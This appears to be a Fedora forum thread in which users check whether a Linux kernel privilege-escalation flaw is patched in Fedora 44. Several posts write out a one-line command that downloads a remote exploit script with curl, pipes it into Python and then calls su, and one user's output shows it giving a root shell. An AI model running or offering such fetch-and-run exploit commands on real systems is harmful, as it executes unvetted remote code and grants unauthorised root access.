Around a day ago a 0-day popped up for essentially all distros with post-2017 versions, including Fedora. I’d like to inquire the status of response to it
Did you bother to search for the CVE number in this forum first ?
The patch for CVE-2026-31431 has been merged to mainline kernel about a month ago, and any stable versions released after that is safe (specifically, 6.18.22+, 6.19.12+ and all versions after 7.0). Your computer is safe as long as you are keeping pace with the latest kernel release in fedora repository, and you can always verify that with the published PoC.
Turns out, no
Do I have brain damage?
dnf update —security did not identity the need to upgrade the kernel in my case, so definitely check the actual installed and running kernel version.
curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:--100 731 0 731 0 0 1721 0 --:--:-- --:--:-- --:--:-- 1724
Password:
su: Authentication failure
Password:
su: Authentication failure
Still no fix for this vulnerability in f44.
sergey@win7:~/work/dirtyfrag$ cat /etc/os-release
NAME="Fedora Linux"
VERSION="44 (Workstation Edition)"
RELEASE_TYPE=stable
ID=fedora
VERSION_ID=44
VERSION_CODENAME=""
PRETTY_NAME="Fedora Linux 44 (Workstation Edition)"
ANSI_COLOR="0;38;2;60;110;180"
LOGO=fedora-logo-icon
CPE_NAME="cpe:/o:fedoraproject:fedora:44"
DEFAULT_HOSTNAME="fedora"
HOME_URL="https://fedoraproject.org/"
DOCUMENTATION_URL="https://docs.fedoraproject.org/en-US/fedora/f44/"
SUPPORT_URL="https://ask.fedoraproject.org/"
BUG_REPORT_URL="https://bugzilla.redhat.com/"
REDHAT_BUGZILLA_PRODUCT="Fedora"
REDHAT_BUGZILLA_PRODUCT_VERSION=44
REDHAT_SUPPORT_PRODUCT="Fedora"
REDHAT_SUPPORT_PRODUCT_VERSION=44
SUPPORT_END=2027-05-19
VARIANT="Workstation Edition"
VARIANT_ID=workstation
sergey@win7:~/work/dirtyfrag$ uname -r
6.19.14-300.fc44.x86_64
sergey@win7:~/work/dirtyfrag$ sudo dnf upgrade --refresh
[sudo] password for sergey:
Updating and loading repositories:
Fedora 44 - x86_64 - Updates 100% | 1.6 KiB/s | 5.7 KiB | 00m04s
RPM Fusion for Fedora 44 - Nonfree - Updates 100% | 2.7 KiB/s | 8.3 KiB | 00m03s
RPM Fusion for Fedora 44 - Nonfree - Steam 100% | 3.3 KiB/s | 8.3 KiB | 00m03s
RPM Fusion for Fedora 44 - Nonfree 100% | 4.5 KiB/s | 9.0 KiB | 00m02s
RPM Fusion for Fedora 44 - Free - Updates 100% | 5.5 KiB/s | 8.2 KiB | 00m01s
RPM Fusion for Fedora 44 - Free 100% | 6.8 KiB/s | 8.9 KiB | 00m01s
Fedora 44 - hardware:razer 100% | 7.8 KiB/s | 1.6 KiB | 00m00s
google-chrome 100% | 6.3 KiB/s | 1.3 KiB | 00m00s
Fedora 44 - x86_64 100% | 15.7 KiB/s | 12.3 KiB | 00m01s
Visual Studio Code 100% | 7.3 KiB/s | 1.5 KiB | 00m00s
Repositories loaded.
Problem 1: cannot install the best update candidate for package mesa-va-drivers-freeworld-26.0.3-1.fc44.x86_64
- nothing provides mesa-filesystem(x86-64) = 26.0.6 needed by mesa-va-drivers-freeworld-26.0.6-1.fc44.x86_64 from rpmfusion-free-updates
Problem 2: problem with installed package
- installed package mesa-va-drivers-freeworld-26.0.3-1.fc44.x86_64 requires mesa-filesystem(x86-64) = 26.0.3, but none of the providers can be installed
- package mesa-va-drivers-freeworld-26.0.3-1.fc44.x86_64 from rpmfusion-free requires mesa-filesystem(x86-64) = 26.0.3, but none of the providers can be installed
- cannot install both mesa-filesystem-26.0.5-3.fc44.x86_64 from updates and mesa-filesystem-26.0.3-4.fc44.x86_64 from @System
- cannot install both mesa-filesystem-26.0.5-3.fc44.x86_64 from updates and mesa-filesystem-26.0.3-4.fc44.x86_64 from fedora
- cannot install the best update candidate for package mesa-filesystem-26.0.3-4.fc44.x86_64
- nothing provides mesa-filesystem(x86-64) = 26.0.6 needed by mesa-va-drivers-freeworld-26.0.6-1.fc44.x86_64 from rpmfusion-free-updates
Package Arch Version Repository Size
Skipping packages with conflicts:
mesa-filesystem x86_64 26.0.5-3.fc44 updates 3.6 KiB
Skipping packages with broken dependencies:
mesa-va-drivers-freeworld x86_64 26.0.6-1.fc44 rpmfusion-free-updates 51.0 MiB
mesa-va-drivers-freeworld x86_64 26.0.3-1.fc44 rpmfusion-free 51.0 MiB
Nothing to do.
sergey@win7:~/work/dirtyfrag$ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 3452 0 0
[root@win7 dirtyfrag]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@win7 dirtyfrag]#
Cannot reproduce on my pc.
~/projects
% uname -a
Linux SolarFedora 6.19.14-300.fc44.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 23 15:17:50 UTC 2026 x86_64 GNU/Linux
~/projects
% curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 658 0 00:01 667
Password: su: Authentication failure
Password:
su: Authentication failure
You wont see any mention in the kernel changelogs as upstream fixed it in 6.19.12 and 7.0
Hm. My bad. It was leftovers from “dirty frag” exploit. su binary didn’t ask for password at all. Flushing page cache fixed the issue.